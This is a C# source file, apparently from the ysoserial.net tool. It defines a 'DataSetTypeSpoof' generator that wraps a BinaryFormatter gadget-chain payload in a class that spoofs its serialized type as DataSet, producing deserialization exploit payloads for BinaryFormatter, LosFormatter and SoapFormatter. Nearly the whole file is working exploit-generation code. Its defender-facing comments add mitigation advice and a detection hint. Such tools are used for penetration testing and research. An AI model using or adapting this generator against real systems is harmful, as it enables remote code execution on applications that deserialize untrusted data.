using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using ysoserial.Helpers;
namespace ysoserial.Generators
{
/// <summary>
/// Generator exposed under the name "DataSetTypeSpoof". It obtains a BinaryFormatter-encoded
/// byte array from <c>TextFormattingRunPropertiesGenerator</c>, wraps it in a
/// <see cref="DataSetSpoofMarshal"/>, and serializes that wrapper with the requested formatter.
/// </summary>
/// <remarks>
/// Reviewer note for defenders: the wrapper's GetObjectData chooses the assembly and type names
/// written to the stream, so those names are producer-controlled. A check that trusts the names
/// recorded in a BinaryFormatter, LosFormatter or SoapFormatter stream is therefore not a
/// sufficient control on its own; the durable mitigation is to stop feeding untrusted bytes to
/// these formatters.
/// </remarks>
public class DataSetTypeSpoofGenerator : DataSetGenerator
{
    /// <summary>Returns the fixed identifier of this generator.</summary>
    public override string Name()
    {
        const string generatorName = "DataSetTypeSpoof";
        return generatorName;
    }

    /// <summary>Returns the credit line for this generator.</summary>
    public override string Contributors()
    {
        const string credits = "Soroush Dalili, Markus Wulftange, Jang";
        return credits;
    }

    /// <summary>
    /// Builds the wrapper object and serializes it with <paramref name="formatter"/>.
    /// </summary>
    /// <param name="formatter">
    /// Formatter name, compared case-insensitively (ordinal) against "binaryformatter",
    /// "losformatter" and "soapformatter".
    /// </param>
    /// <param name="inputArgs">Options forwarded to the inner generator and to Serialize.</param>
    /// <returns>Whatever Serialize returns for the wrapper object.</returns>
    /// <exception cref="Exception">The formatter name is not one of the three accepted values.</exception>
    public override object Generate(string formatter, InputArgs inputArgs)
    {
        // The inner stream is always requested as "BinaryFormatter", whatever the outer formatter is.
        // It is built before the formatter name is validated, exactly as in the original ordering.
        object innerStream =
            new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);

        // The explicit byte[] cast selects the byte[] constructor rather than the object overload,
        // so the bytes are stored as-is instead of being serialized a second time.
        DataSetSpoofMarshal wrapper = new DataSetSpoofMarshal((byte[]) innerStream);

        string[] acceptedFormatters = { "binaryformatter", "losformatter", "soapformatter" };
        foreach (string accepted in acceptedFormatters)
        {
            if (formatter.Equals(accepted, StringComparison.OrdinalIgnoreCase))
            {
                // Serialize is not defined in this class; presumably inherited from DataSetGenerator.
                return Serialize(wrapper, formatter, inputArgs);
            }
        }

        throw new Exception("Formatter not supported");
    }
}
// https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
/// <summary>
/// Serialization surrogate object: when a formatter serializes an instance, the entries written
/// are the ones <see cref="GetObjectData"/> supplies, labelled with the assembly and type names
/// it assigns rather than with this class's own identity.
/// </summary>
/// <remarks>
/// Reviewer note for defenders: this class shows that the type identity recorded in a serialized
/// stream is whatever the producer's <c>ISerializable</c> implementation wrote. Here the
/// type-name field carries an assembly-qualified name while the assembly field says "mscorlib";
/// that combination looks unusual for ordinary streams and may be worth flagging when
/// inspecting captured data (hedged: confirm against your own baseline). Avoid deserializing
/// untrusted input with BinaryFormatter-family formatters and treat <c>DataSet</c> /
/// <c>DataTable</c> input from untrusted sources as unsafe.
/// </remarks>
[Serializable]
public class DataSetSpoofMarshal : ISerializable
{
    // Bytes emitted as the single "DataSet.Tables_0" entry.
    byte[] _fakeTable;

    /// <summary>Stores <paramref name="bfPayload"/> unchanged as the table entry.</summary>
    public DataSetSpoofMarshal(byte[] bfPayload)
    {
        SetFakeTable(bfPayload);
    }

    /// <summary>
    /// Serializes <paramref name="fakeTable"/> with default options and stores the result.
    /// </summary>
    /// <remarks>
    /// Overload resolution matters: an argument statically typed as <c>byte[]</c> or
    /// <c>MemoryStream</c> binds to the dedicated constructors, not to this one.
    /// </remarks>
    public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
    {
        // A fresh InputArgs is used here, so options configured elsewhere for the project's
        // BinaryFormatter processing (minification, for example) do not apply on this path.
    }

    /// <summary>
    /// Serializes <paramref name="fakeTable"/> into memory and stores the resulting bytes.
    /// </summary>
    /// <param name="fakeTable">Object graph to serialize.</param>
    /// <param name="inputArgs">
    /// Only <c>Minify</c> is read: when set, the project's modified BinaryFormatter is used,
    /// otherwise the framework BinaryFormatter.
    /// </param>
    public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
    {
        MemoryStream buffer = new MemoryStream();
        bool useMinifyingFormatter = inputArgs.Minify;

        if (!useMinifyingFormatter)
        {
            BinaryFormatter frameworkFormatter = new BinaryFormatter();
            frameworkFormatter.Serialize(buffer, fakeTable);
        }
        else
        {
            ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter minifyingFormatter =
                new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
            minifyingFormatter.Serialize(buffer, fakeTable);
        }

        SetFakeTable(buffer.ToArray());
    }

    /// <summary>Copies the full contents of <paramref name="ms"/> and stores them.</summary>
    public DataSetSpoofMarshal(MemoryStream ms)
    {
        byte[] snapshot = ms.ToArray();
        SetFakeTable(snapshot);
    }

    /// <summary>Replaces the stored table bytes; no copy is made.</summary>
    public void SetFakeTable(byte[] bfPayload)
    {
        _fakeTable = bfPayload;
    }

    /// <summary>
    /// Supplies the entries and the type identity that a formatter writes for this object.
    /// </summary>
    /// <param name="info">Receives the assembly name, type name and the "DataSet.*" entries.</param>
    /// <param name="context">Not used.</param>
    public void GetObjectData(SerializationInfo info, StreamingContext context)
    {
        // The original leaves info.SetType(typeof(System.Data.DataSet)) commented out and
        // assigns the two name fields directly instead.
        Type declaredType = typeof(System.Data.DataSet);
        info.AssemblyName = "mscorlib";
        info.FullTypeName = declaredType.AssemblyQualifiedName;

        // Entries are added in the same order as the original.
        const int localeId = 0x409; // 1033
        const int tableCount = 1;

        info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
        info.AddValue("DataSet.DataSetName", string.Empty);
        info.AddValue("DataSet.Namespace", string.Empty);
        info.AddValue("DataSet.Prefix", string.Empty);
        info.AddValue("DataSet.CaseSensitive", false);
        info.AddValue("DataSet.LocaleLCID", localeId);
        info.AddValue("DataSet.EnforceConstraints", false);
        info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
        info.AddValue("DataSet.Tables.Count", tableCount);
        info.AddValue("DataSet.Tables_0", _fakeTable);
    }
}
}